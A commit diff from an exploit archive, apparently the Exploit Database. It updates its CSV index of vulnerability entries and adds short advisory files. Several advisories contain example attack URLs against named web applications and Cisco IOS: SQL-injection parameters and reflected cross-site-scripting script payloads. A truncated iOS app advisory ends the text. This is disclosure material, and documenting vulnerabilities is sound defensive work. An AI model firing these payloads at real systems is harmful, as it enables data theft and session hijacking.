Updated 04_09_2014

files.csv

@@ -4973,7 +4973,7 @@ id,file,description,date,author,platform,type,port
 5339,platforms/php/webapps/5339.php,"Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities Exploit",2008-04-01,"Charles Fol",php,webapps,0
 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0
 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0
-5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510
+5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510
 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0
 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP Denial of Service Exploit",2008-04-02,muts,windows,dos,0
 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability",2008-04-02,NoGe,php,webapps,0
@@ -8940,7 +8940,7 @@ id,file,description,date,author,platform,type,port
 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0
 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup Vulnerability",2009-08-18,alnjm33,php,webapps,0
 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
-9477,platforms/linux/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,linux,local,0
+9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,android,local,0
 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (simple ver)",2009-08-24,"INetCop Security",linux,local,0
 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
@@ -13375,7 +13375,7 @@ id,file,description,date,author,platform,type,port
 15420,platforms/windows/dos/15420.c,"Avast! Internet Security aswtdi.sys 0day Local DoS PoC",2010-11-04,"Nikita Tarakanov",windows,dos,0
 15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit",2010-11-04,ryujin,windows,remote,0
 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0
-15423,platforms/hardware/remote/15423.html,"Android 2.0-2.1 Reverse Shell Exploit",2010-11-05,"MJ Keith",hardware,remote,0
+15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
 15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0
 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - (0day) Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0
 15428,platforms/multiple/dos/15428.rb,"Avidemux <= 2.5.4 - Buffer Overflow Vulnerability",2010-11-05,The_UnKn@wn,multiple,dos,0
@@ -13471,7 +13471,7 @@ id,file,description,date,author,platform,type,port
 15543,platforms/php/webapps/15543.txt,"Chameleon Social Networking Software Persistent XSS Vulnerability",2010-11-15,Dr-mosta,php,webapps,0
 15544,platforms/asp/webapps/15544.txt,"Web Wiz NewsPad Express Edition 1.03 Database File Disclosure Vulnerability",2010-11-15,keracker,asp,webapps,0
 15545,platforms/php/webapps/15545.txt,"Nuked-Klan Module Boutique Blind SQL Injection",2010-11-15,[AR51]Kevinos,php,webapps,0
-15548,platforms/hardware/remote/15548.html,"Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",hardware,remote,0
+15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0
 15549,platforms/php/webapps/15549.txt,"Joomla Component (com_alfurqan15x) SQL Injection Vulnerability",2010-11-15,kaMtiEz,php,webapps,0
 15550,platforms/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent XSS via Profile Customization",2010-11-16,MaXe,php,webapps,0
 15551,platforms/asp/webapps/15551.txt,"BPAffiliate Affiliate Tracking Authentication Bypass Vulnerability",2010-11-16,v3n0m,asp,webapps,0
@@ -13912,8 +13912,8 @@ id,file,description,date,author,platform,type,port
 16095,platforms/linux/dos/16095.pl,"Terminal Server Client .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0
 16096,platforms/php/webapps/16096.txt,"redaxscript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0
 16097,platforms/php/webapps/16097.txt,"Zikula CMS <= 1.2.4 CSRF Vulnerability",2011-02-02,"Aung Khant",php,webapps,0
-16098,platforms/hardware/local/16098.c,"Android 1.x/2.x HTC Wildfire Local Root Exploit",2011-02-02,"The Android Exploid Crew",hardware,local,0
-16099,platforms/hardware/local/16099.c,"Android 1.x/2.x Local Root Exploit",2011-02-02,"The Android Exploid Crew",hardware,local,0
+16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0
+16099,platforms/android/local/16099.c,"Android 1.x/2.x - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0
 16100,platforms/hardware/remote/16100.txt,"Tandberg E, EX and C Series Endpoints Default Credentials for Root Account",2011-02-02,"Cisco Security",hardware,remote,0
 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - Buffer Overflow (PASV) Exploit",2011-02-03,modpr0be,windows,remote,0
 16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - (details.php) Remote SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0
@@ -14748,7 +14748,7 @@ id,file,description,date,author,platform,type,port
 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)",2011-03-14,Rh0,windows,local,0
 16972,platforms/hardware/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,hardware,remote,0
 16973,platforms/linux/dos/16973.c,"Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0
-16974,platforms/hardware/remote/16974.html,"Android 2.0 ,2.1, 2.1.1 WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",hardware,remote,0
+16974,platforms/android/remote/16974.html,"Android 2.0 ,2.1, 2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0
 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0
 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 .lst Buffer Overflow Exploit (SEH)",2011-03-14,h1ch4m,windows,local,0
 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 .fcd Buffer Overflow Exploit",2011-03-14,h1ch4m,windows,local,0
@@ -15743,7 +15743,7 @@ id,file,description,date,author,platform,type,port
 18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0
 18162,platforms/linux/shellcode/18162.c,"Linux/MIPS - execve /bin/sh - 48 bytes",2011-11-27,rigan,linux,shellcode,0
 18163,platforms/linux/shellcode/18163.c,"Linux/MIPS - add user(UID 0) with password - 164 bytes",2011-11-27,rigan,linux,shellcode,0
-18164,platforms/hardware/webapps/18164.php,"Android 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",hardware,webapps,0
+18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0
 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin 0day",2011-11-28,Alberto_García_Illera,php,webapps,0
@@ -15946,7 +15946,7 @@ id,file,description,date,author,platform,type,port
 18442,platforms/multiple/remote/18442.html,"Apache httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0
 18443,platforms/php/webapps/18443.txt,"swDesk Multiple Vulnerabilities",2012-02-01,"Red Security TEAM",php,webapps,0
 18444,platforms/php/webapps/18444.txt,"sit! support incident tracker 3.64 - Multiple Vulnerabilities",2012-02-01,"High-Tech Bridge SA",php,webapps,0
-18446,platforms/hardware/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",hardware,remote,0
+18446,platforms/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",android,remote,0
 18447,platforms/asp/webapps/18447.txt,"MailEnable Webmail Cross-Site Scripting Vulnerability",2012-01-13,"Sajjad Pourali",asp,webapps,0
 18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",2012-02-02,metasploit,windows,remote,0
 18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",2012-02-02,metasploit,windows,remote,0
@@ -16096,7 +16096,7 @@ id,file,description,date,author,platform,type,port
 18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability",2012-03-19,rgod,jsp,webapps,0
 18628,platforms/windows/dos/18628.py,"PeerFTP Server <= 4.01 - Remote Crash PoC",2012-03-20,localh0t,windows,dos,0
 18629,platforms/windows/dos/18629.py,"Tiny Server <= 1.1.9 HTTP HEAD DoS",2012-03-20,"brock haun",windows,dos,0
-18630,platforms/hardware/dos/18630.txt,"Android FTPServer 1.9.0 - Remote DoS",2012-03-20,G13,hardware,dos,0
+18630,platforms/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote DoS",2012-03-20,G13,android,dos,0
 18631,platforms/php/webapps/18631.txt,"OneForum (topic.php) SQL Injection Vulnerability",2012-03-20,"Red Security TEAM",php,webapps,0
 18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0
 18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 Tiff Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0
@@ -17219,7 +17219,7 @@ id,file,description,date,author,platform,type,port
 19886,platforms/multiple/remote/19886.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (1)",2000-05-02,FuSyS,multiple,remote,0
 19887,platforms/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote,0
 19888,platforms/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (3)",2002-01-18,g463,multiple,remote,0
-19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability",2000-05-02,"rain forest puppy",windows,remote,0
+19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name Vulnerability",2000-05-02,"rain forest puppy",windows,remote,0
 19890,platforms/cgi/remote/19890.txt,"ultrascripts ultraboard 1.6 - Directory Traversal vulnerability",2000-05-03,"Rudi Carell",cgi,remote,0
 19891,platforms/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (1)",1999-05-31,"Hugo Breton",linux,remote,0
 19892,platforms/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (2)",1999-05-31,scut,linux,remote,0
@@ -20460,7 +20460,7 @@ id,file,description,date,author,platform,type,port
 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability",2003-10-15,"Oliver Karow",linux,dos,0
 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 Integer Overflow",2012-12-09,beford,windows,dos,0
 23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability",2003-10-25,Adik,windows,remote,0
-23248,platforms/arm/dos/23248.txt,"Android Kernel 2.6 - Local DoS Crash PoC",2012-12-09,G13,arm,dos,0
+23248,platforms/android/dos/23248.txt,"Android Kernel 2.6 - Local DoS Crash PoC",2012-12-09,G13,android,dos,0
 23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent XSS",2012-12-09,VipVince,php,webapps,0
 23250,platforms/hardware/webapps/23250.txt,"Cisco DPC2420 Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps,0
 23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0
@@ -25972,7 +25972,7 @@ id,file,description,date,author,platform,type,port
 28954,platforms/php/webapps/28954.txt,"Bitweaver 1.x fisheye/list_galleries.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow SEH",2013-10-14,metacom,windows,local,0
 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4, 0.8.2, 0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80
-28957,platforms/hardware/dos/28957.txt,"Android Zygote Socket Vulnerability Fork bomb Attack",2013-10-14,"Luca Verderame",hardware,dos,0
+28957,platforms/android/dos/28957.txt,"Android Zygote - Socket Vulnerability Fork bomb Attack",2013-10-14,"Luca Verderame",android,dos,0
 28959,platforms/php/webapps/28959.txt,"Wordpress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80
 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80
 28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console Java Execution",2013-10-14,metasploit,multiple,remote,0
@@ -28122,8 +28122,8 @@ id,file,description,date,author,platform,type,port
 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0
 31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat - Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0
 31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service Vulnerability",2008-02-26,sipherr,hardware,dos,0
-31307,platforms/hardware/dos/31307.py,"Android Web Browser - GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0
-31308,platforms/hardware/dos/31308.html,"Android Web Browser - BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0
+31307,platforms/android/dos/31307.py,"Android Web Browser - GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",android,dos,0
+31308,platforms/android/dos/31308.html,"Android Web Browser - BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",android,dos,0
 31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow Vulnerability",2008-02-27,"Will Drewry",linux,remote,0
 31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow Vulnerability and Denial of Service Vulnerability",2008-02-27,"Luigi Auriemma",windows,dos,0
 31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross Site Scripting Vulnerability",2008-02-28,"Richard Brain",hardware,remote,0
@@ -29428,6 +29428,7 @@ id,file,description,date,author,platform,type,port
 32665,platforms/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
 32666,platforms/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
 32667,platforms/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",hardware,webapps,80
+32668,platforms/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple XSS Vulnerabilities",2014-04-03,"Blessen Thomas",php,webapps,0
 32669,platforms/php/webapps/32669.txt,"phpcksec 0.2 'phpcksec.php' Cross Site Scripting Vulnerability",2008-12-17,ahmadbady,php,webapps,0
 32670,platforms/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",php,webapps,0
 32671,platforms/php/webapps/32671.txt,"DO-CMS 3.0 'p' Parameter Multiple SQL Injection Vulnerabilities",2008-12-18,"crash over",php,webapps,0
@@ -29450,6 +29451,7 @@ id,file,description,date,author,platform,type,port
 32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0
 32689,platforms/php/webapps/32689.txt,"NPDS Versions Prior to 08.06 Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0
 32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0
+32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow Vulnerability",2008-12-30,"Anton Khirnov",linux,remote,0
 32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/MMS Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0
 32693,platforms/php/local/32693.php,"suPHP <= 0.7 'suPHP_ConfigPath' Safe Mode Restriction-Bypass Vulnerability",2008-12-31,Mr.SaFa7,php,local,0
 32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (1)",2009-01-01,"Jeremy Brown",osx,dos,0
@@ -29457,9 +29459,12 @@ id,file,description,date,author,platform,type,port
 32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0
 32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0
 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0
+32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure Vulnerability",2009-01-05,"Aditya K Sood",windows,remote,0
 32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0
 32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80
 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80
+32703,platforms/hardware/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,hardware,webapps,0
+32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability",2014-04-05,LiquidWorm,windows,dos,0
 32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
 32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
 32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
@@ -29471,3 +29476,18 @@ id,file,description,date,author,platform,type,port
 32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0
 32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
 32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0
+32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities (XSS & CSRF)",2014-04-07,"Mayank Kapoor",php,webapps,0
+32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0
+32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 'login.php' SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0
+32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector Directory Traversal",2014-04-07,metasploit,windows,remote,8080
+32726,platforms/linux/dos/32726.txt,"Ganglia gmetad <= 3.0.6 'process_path()' Remote Stack Buffer Overflow Vulnerability",2009-01-15,"Spike Spiegel",linux,dos,0
+32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0
+32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 /modules/rss/handler_image.php i Parameter XSS",2009-01-15,waraxe,php,webapps,0
+32729,platforms/asp/webapps/32729.txt,"LinksPro 'OrderDirection' Parameter SQL Injection Vulnerability",2009-01-15,Pouya_Server,asp,webapps,0
+32730,platforms/asp/webapps/32730.txt,"Active Bids search.asp search Parameter XSS",2009-01-15,Pouya_Server,asp,webapps,0
+32731,platforms/asp/webapps/32731.txt,"Active Bids search.asp search Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0
+32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 'SearchKeywords' Parameter SQL Injection Vulnerability",2009-01-15,Pouya_Server,php,webapps,0
+32733,platforms/php/webapps/32733.txt,"w3bcms 'admin/index.php' SQL Injection Vulnerability",2009-01-15,Pouya_Server,php,webapps,0
+32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 User Enumeration Weakness and Cross Site Scripting Vulnerability",2009-01-16,"clément Oudot",cgi,webapps,0
+32735,platforms/asp/webapps/32735.txt,"Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0
+32736,platforms/asp/webapps/32736.txt,"Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS",2009-01-16,Pouya_Server,asp,webapps,0

platforms/asp/webapps/32729.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/33305/info
+  
+LinksPro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[Path]/default.asp?QS=True&OrderDirection='[SQL]&OrderField=codefixerlp_tblLink_flddateadded 
+

platforms/asp/webapps/32730.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33306/info
+
+
+Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[Path]/search.asp?search=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&submit=%3E
+
+http://www.example.com/[Path]/search.asp?search=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=%3E 

platforms/asp/webapps/32731.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33306/info
+ 
+Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[Path]/search.asp?search='[SQL]&submit=%3E

platforms/asp/webapps/32735.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33314/info
+
+DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[Path]/inc_webblogmanager.asp?CategoryID=121&ItemID=[SQL]&action=view

platforms/asp/webapps/32736.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33314/info
+ 
+DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+http://www.example.com/[Path]/inc_webblogmanager.asp?CategoryID=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&ItemID=1&action=refer 

platforms/cgi/webapps/32734.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/33312/info
+
+LemonLDAP:NG is prone to a user-enumeration weakness and a cross-site scripting vulnerability.
+
+A remote attacker can exploit the user-enumeration weakness to enumerate valid usernames and then perform brute-force attacks; other attacks are also possible.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to LemonLDAP::NG 0.9.3.2 are vulnerable. 
+
+http://www.example.com/index.pl?url=";><script>alert("You were hacked!")</script><br" 

platforms/hardware/remote/32723.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33260/info
+
+Cisco IOS HTTP Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues are tracked by Cisco bug IDs CSCsi13344 and CSCsr72301. 
+
+http://www.example.com/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script> 

platforms/hardware/webapps/32703.txt

@@ -0,0 +1,251 @@
+Document Title:
+===============
+Private Photo+Video v1.1 Pro iOS - Persistent Vulnerability 
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1249
+
+
+Release Date:
+=============
+2014-04-01
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1249
+
+
+Common Vulnerability Scoring System:
+====================================
+3.8
+
+
+Product & Service Introduction:
+===============================
+Image Downloader Pro helps you easily download unlimited images to your iPhone, FAST and CONVENIENTLY. You can easily download 
+your favourite photos and instantly view them on your iPhone ANYTIME, ANYWHERE.
+
+It is pretty HANDY! A collection of helpful photo websites are there waiting for you. You can see what`s happening and easily 
+download your favourite moment. What you need to do is just to click one of the bookmarks and then click `download` when your 
+favorite photos hop out !
+
+Other features:
+- Bookmarks of various photo websites are ready here
+- You can enjoy the amazingly fast downloading
+- You can still make the largest album of your own favorite photos
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/private-photo+video-pro-secret/id518972230 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a persistent validation web vulnerability in the official Private Photo+Video v1.1 Pro iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-04-01:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Free Music Download, Pro Downloader, Player & Lite Manager
+Product: Private Photo+Video Pro - iOS Mobile Web Application 1.1
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
